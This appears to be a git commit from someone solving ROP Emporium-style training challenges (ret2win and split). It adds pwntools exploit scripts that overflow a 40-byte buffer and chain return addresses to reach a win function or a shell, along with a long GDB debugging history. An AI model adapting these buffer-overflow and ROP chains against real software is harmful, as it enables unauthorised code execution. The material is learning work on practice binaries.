new file: x86_64/ret2win/.gdb_history

new file:   x86_64/ret2win/core
	new file:   x86_64/ret2win/exploit.py
	new file:   x86_64/split/.gdb_history
	new file:   x86_64/split/core
	new file:   x86_64/split/core.split.25050
	new file:   x86_64/split/exploit.py
	new file:   x86_64/split/fuckyou
	new file:   x86_64/split/xaa

x86_64/ret2win/.gdb_history

@@ -0,0 +1,6 @@
+starti
+context
+nexti
+break main 
+continue
+q

x86_64/ret2win/exploit.py

@@ -0,0 +1,13 @@
+#!/usr/bin/env python3
+from pwn import *
+
+prog = process('./ret2win')
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+payload += p64(0x0000000000400756)
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))

x86_64/split/.gdb_history

@@ -0,0 +1,256 @@
+print (char)usefulString 
+print (char&)usefulString 
+print (char*)usefulString 
+print (char)*usefulString 
+print (charusefulString 
+print (char)usefulString 
+print (char*)usefulString 
+print (char)*usefulString 
+quit
+exit
+quit
+nexti
+exit
+quit
+exit
+quit
+quit
+exit
+quit
+context
+next
+continue
+context
+quit
+nexti
+continu
+context
+q
+context
+run
+break main
+continue
+context
+nexti
+backtrace
+set exception-debugger on
+continue
+quit
+stepi
+ret
+return
+stepi
+break
+delete 
+run
+continue
+clear 
+delete
+continue
+clear
+delete
+continue
+delete 0x7f992453fece
+delete 0
+delete 1
+delete 2
+delete 3
+quit
+continue
+context
+q
+context
+q
+quit
+continue
+context
+continue
+q
+q
+break main
+continue
+context
+nexti
+stepi
+quit
+break main
+run
+conitnue
+continue
+context
+stepi
+nexti
+stepi
+return
+stepi
+return
+stepi
+ret
+return
+stepi
+return
+stepi
+stepi
+info breakpoints
+stepi
+return
+stepi
+nexti
+break 0x400706
+break *0x400706
+quit
+continue
+context
+q
+continue
+context
+continue
+quit
+continue
+continue
+quit
+continue
+context
+quit
+continue
+quit
+exit
+quit
+nexti
+continue
+quit
+continue
+quit
+break pwnme
+nexti
+continue
+bexti
+nexti
+quit
+quit
+continue
+quit
+continue
+nexti
+quit
+continue
+q
+continue
+quit
+continue
+[
+quit
+start < fuckyou
+continue
+q
+break *0x0x000000000040074b
+break *0x000000000040074b
+run < fuckyou
+context
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 20
+x/s 0x7fffffffdb2
+quit
+break *0x000000000040074b
+run < fuckyou
+context
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 8
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 8
+x/s 0x7fffffffdb20 + 8
+quit
+quit
+run < fuckyou 
+quit
+break *0x000000000040074b
+run < fuckyou 
+context
+stepi
+q
+break *0x000000000040074b
+run < fuckyou 
+context
+q
+break *0x000000000040074b
+run < fuckyou 
+context
+x 0x7fffffffdb20-8
+x 0x7ffff7fad800
+q
+break pwnme
+run < fuckyou 
+nexti
+q
+break pwnme
+run
+q
+break pwnme
+run < fuckyou
+context
+nexti
+q
+break pwnme
+run < fuckyou
+nexti
+x/100c 0x7ffff7fad800
+context
+nexti
+quit
+break *0x00000000004007c3
+run < fuckyou
+context
+nexti
+stepi
+q
+break pwnme
+start < fuckyou
+context
+stepi
+return
+context
+break pwnme
+continue
+q
+break pwnme
+run < fuckyou
+context
+nexti
+stepi
+q
+continue
+quit
+continue
+[A
+quit
+q
+info break
+nexti
+break main
+continue
+nexti
+return
+nexti
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+q
+continue
+nexti
+q
+continue
+nexti
+continue
+quit

x86_64/split/exploit.py

@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+from pwn import *
+
+
+context.binary = "./split"
+prog = process('./split')
+payload = b''
+
+for c in range(40): #originally 40
+    payload += b'a'
+
+payload += p64(0x00000000004007c3) 
+payload += p64(0x0000000000601060) # usefulString
+payload += p64(0x000000000040074b) # usefulFunction + offset
+
+prog.sendline(payload)
+prog.interactive()